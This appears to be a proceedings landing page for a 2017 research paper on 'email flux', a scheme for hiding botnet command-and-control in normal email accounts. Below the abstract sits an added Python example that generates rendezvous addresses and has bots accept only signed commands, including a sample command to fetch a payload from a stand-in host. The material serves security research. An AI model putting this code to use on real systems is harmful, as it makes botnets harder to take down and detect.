Security and Privacy in Communication Networks. SecureComm 2017 International Workshops, ATCS and SePrIoT, Niagara Falls, ON, Canada, October 22–25, 2017, Proceedings

Research Article

Hiding Fast Flux Botnet in Plain Email Sight

Cite

BibTeX:
@INPROCEEDINGS{10.1007/978-3-319-78816-6_14,
    author={Zhi Wang and Meilin Qin and Mengqi Chen and Chunfu Jia},
    title={Hiding Fast Flux Botnet in Plain Email Sight},
    proceedings={Security and Privacy in Communication Networks. SecureComm 2017 International Workshops, ATCS and SePrIoT, Niagara Falls, ON, Canada, October 22--25, 2017, Proceedings},
    proceedings_a={SECURECOMM \& ATCS \& SEPRIOT},
    year={2018},
    month={4},
    keywords={Fast flux, Domain flux, Botnet, Command and control channel, Evasion technique},
    doi={10.1007/978-3-319-78816-6_14}
}

Plain text:
Zhi Wang, Meilin Qin, Mengqi Chen, Chunfu Jia. Hiding Fast Flux Botnet in Plain Email Sight. SECURECOMM & ATCS & SEPRIOT, Springer, 2018. DOI: 10.1007/978-3-319-78816-6_14
Zhi Wang (1), Meilin Qin (1), Mengqi Chen (1), Chunfu Jia (1, *)
  • 1: Nankai University
* Contact email: cfjia@nankai.edu.cn

Abstract

Fast flux and domain flux are widely used as evasion techniques to conceal botnet C&C servers, but more and more machine learning schemes are now being introduced to recognize and detect fluxing botnets automatically and effectively. In this paper, we propose a novel fluxing scheme that hides the C&C server in plain email sight. Email flux tries to blend in with normal email communication: because email servers enjoy an excellent reputation, the malicious activity is more likely to get lost in the normal email crowd, and DNS-based botnet detection schemes therefore have difficulty detecting an email flux botnet. Compared with registering a public IP address or a domain, registering an email account costs much less, and an email account reveals less geolocation information. We also introduce an asymmetric encryption strategy to fortify the DGA, preventing adversaries from taking down the botnet by registering the generated email accounts before the botmaster does. Finally, we discuss possible future countermeasures to mitigate email flux.
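The abstract describes two mechanisms: a DGA that predicts rendezvous email accounts, and an asymmetric-key scheme so that a defender who pre-registers those accounts cannot take over the botnet. The paper's exact construction is not on this page, so the sketch below is an added example written by the editor, not the authors' code. It assumes one plausible realization of that idea: candidate addresses are derived from a date and a shared seed, the botmaster signs every command with a private key, and bots only obey messages that verify under a public key baked into the bot. The provider list, the seed and the mailbox contents are constructed for the demo, and the RSA is a textbook toy with no padding, used only to show why squatting the accounts does not yield control.

```python
# Added example (editor's illustration, not the paper's code): an email-flux
# rendezvous in which bots walk DGA-predicted mailboxes and keep only commands
# that verify under a public key embedded in the bot.  Textbook RSA without
# padding: enough to show the mechanism, never use it for real signatures.
import datetime
import hashlib
import math
import random

# Constructed provider list; the providers used by the real scheme are not on the page.
PROVIDERS = ("example.com", "example.net", "example.org")


def dga_email_addresses(day, seed, count=5):
    """Derive `count` candidate mailbox addresses for one day from a shared seed."""
    addresses = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}|{day.isoformat()}|{i}".encode()).hexdigest()
        local_part = digest[:12]
        provider = PROVIDERS[int(digest[12:14], 16) % len(PROVIDERS)]
        addresses.append(f"{local_part}@{provider}")
    return addresses


def _is_probable_prime(n, rounds=20):
    """Miller-Rabin probable-prime test, adequate for a toy key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_keypair(bits=512, seed=None):
    """Return ((n, e), (n, d)); `seed` makes the key reproducible for the demo."""
    rng = random.Random(seed)
    e = 65537

    def random_prime():
        while True:
            candidate = rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
            if _is_probable_prime(candidate):
                return candidate

    while True:
        p, q = random_prime(), random_prime()
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (p * q, e), (p * q, pow(e, -1, phi))


def _digest_int(message):
    return int.from_bytes(hashlib.sha256(message).digest(), "big")


def sign(message, private_key):
    n, d = private_key
    return pow(_digest_int(message), d, n)


def verify(message, signature, public_key):
    n, e = public_key
    return 0 < signature < n and pow(signature, e, n) == _digest_int(message)


def bot_poll(mailboxes, addresses, public_key):
    """A bot reads every predicted mailbox and splits commands by signature check."""
    accepted, rejected = [], []
    for address in addresses:
        for message, signature in mailboxes.get(address, []):
            bucket = accepted if verify(message, signature, public_key) else rejected
            bucket.append((address, message))
    return accepted, rejected


def simulate_rendezvous(day, seed, public_key, private_key):
    """Defender squats the first two predicted mailboxes; the botmaster gets the third."""
    addresses = dga_email_addresses(day, seed, 3)
    forged = b"cmd:uninstall"
    _, squatter_key = generate_keypair(512, seed=2)  # defender's own key, not the botmaster's
    mailboxes = {
        addresses[0]: [(forged, 12345)],                         # unsigned garbage
        addresses[1]: [(forged, sign(forged, squatter_key))],    # signed with the wrong key
    }
    real = b"cmd:update;url=http://example.invalid/payload"
    mailboxes[addresses[2]] = [(real, sign(real, private_key))]
    return bot_poll(mailboxes, addresses, public_key)


if __name__ == "__main__":
    pub, priv = generate_keypair(512, seed=1)
    ok, bad = simulate_rendezvous(datetime.date(2017, 10, 22), "constructed-seed", pub, priv)
    print("accepted:", ok)
    print("rejected:", bad)
```

The defender can still register the predicted accounts and watch which bots poll them, which is the sinkholing value the abstract's countermeasures would build on; what the signature check removes is the ability to push a takedown command from a squatted mailbox.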

Keywords
Fast flux, Domain flux, Botnet, Command and control channel, Evasion technique
Published
2018-04-26
Appears in
SpringerLink
http://dx.doi.org/10.1007/978-3-319-78816-6_14